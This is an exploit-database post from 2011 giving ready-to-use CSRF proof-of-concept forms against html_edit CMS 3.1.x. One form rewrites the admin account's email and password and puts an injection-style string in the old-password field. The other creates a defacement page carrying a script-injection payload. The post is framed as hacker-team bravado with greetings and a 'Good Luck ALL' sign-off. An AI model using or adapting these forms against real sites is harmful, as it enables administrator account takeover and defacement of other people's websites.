html_edit CMS <= 3.1.x Multiple (XSRF/CSRF) Vulnerabilites



EKU-ID: 344 CVE: OSVDB-ID:
Author: KedAns-Dz Published: 2011-05-30 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : html_edit CMS <= 3.1.x Multiple (XSRF/CSRF) Vulnerabilites
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote Cross-Site Request Forgery (Multiple)
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]
###
# xXx < Greetings to 'indoushka' at the Jail ... and to his mother 'Rebbi Ya3tik eSber' > xXx
###

# (!) Exploit & PoC :

#=(1)======[Change Admin Settings :]=======>

<div class="box">
<h2> (CSRF) Change Admin Setting :</h2>
<form method="post" action="http://[target]/admin_area/members.php?page=2&userid=1">
<table>
<label for="username">Username: </label>
<input type="text" name="username" value="KedAns-Dz" />
<label for="role">Role: </label>
<select name="role">
<option value="1">Admin</option>
</select>
<label for="gh-vrg">Secret question: </label>
<input type="text" name="gh-vrg" value="1+2=?">
<label for="gh-awn">Secret awnser</label>
<input type="text" name="gh-awn" value="3">
<label for="active">Active? </label>
<select name="active">
<option value="1">Yes</option>
</select>
<label for="old-pw">Old password: </label>
<input type="password" name="old-pw" value="' or '1=1" />
<label for="new-pw">New password: </label>
<input type="password" name="new-pw" />
<label for="new-pw-c">New password (confirmation): </label></td>
<input type="password" name="new-pw-c" />
<label for="new-email">New Email: </label>
<input type="text" name="new-email" size="50" value="ked-h@1337day.com"/>
<label for="new-email-c">New Email (confirmation): </label>
<input type="text" name="new-email-c" size="50" value="ked-h@1337day.com"/>
</table>
<input type="submit" class="button" name="submit" value="Save changes" />
</form>
</div>

#=(2)======[Add New Page & XSS :]=======>

<div class="box">
<h2> (XSRF) Create a new page :</h2>
<form action="http://[target]/admin_area/pages.php?page=2" method="post">
<table>
<input type="text" name="fullpagename" value="HaCked By KedAns-Dz "/>
<input type="text" name="shortpagename" value="Inj3ct0r" />
<textarea id="textarea1" name="newpagecontent" style="width: 100%; height: 400px;">
<h1> HaCked By KedAns-Dz </h1>
<script>alert('XSS-31337-AtT4cK');</script>
</textarea>
<input class="button" type="submit" value="Create page" />
<input type="hidden" name="createpage" value="true" />
</table>
</form>
</div>

# (^_^) ! Good Luck ALL ...

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================